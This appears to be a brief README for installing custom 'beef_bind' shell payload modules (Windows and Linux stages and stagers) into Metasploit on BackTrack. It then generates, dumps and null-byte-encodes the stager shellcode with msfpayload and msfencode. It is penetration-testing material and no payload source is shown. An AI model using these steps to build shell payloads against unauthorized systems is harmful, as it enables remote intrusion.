
Install into Metasploit on BackTrack:

cp beef_bind-handler.rb /pentest/exploits/framework3/lib/msf/core/handler/beef_bind.rb 
cp beef_bind-stage-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stages/windows/beef_shell.rb 
cp beef_bind-stager-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/windows/beef_bind.rb 
cp beef_bind-stage-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x86/beef_shell.rb
cp beef_bind-stager-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x86/beef_bind.rb
cp beef_bind-stage-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x64/beef_shell.rb
cp beef_bind-stager-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x64/beef_bind.rb

Check it works:

msfpayload -l | grep beef_bind


Get info on the payload:

msfpayload windows/beef_shell/beef_bind S


Dump stager and stage in C format:

msfpayload windows/beef_shell/beef_bind C


Dump stager in raw format:

msfpayload windows/beef_shell/beef_bind R > beef_bind-stager


Encode stager to remove nulls:

msfpayload windows/beef_shell/beef_bind R | msfencode -b '\x00'



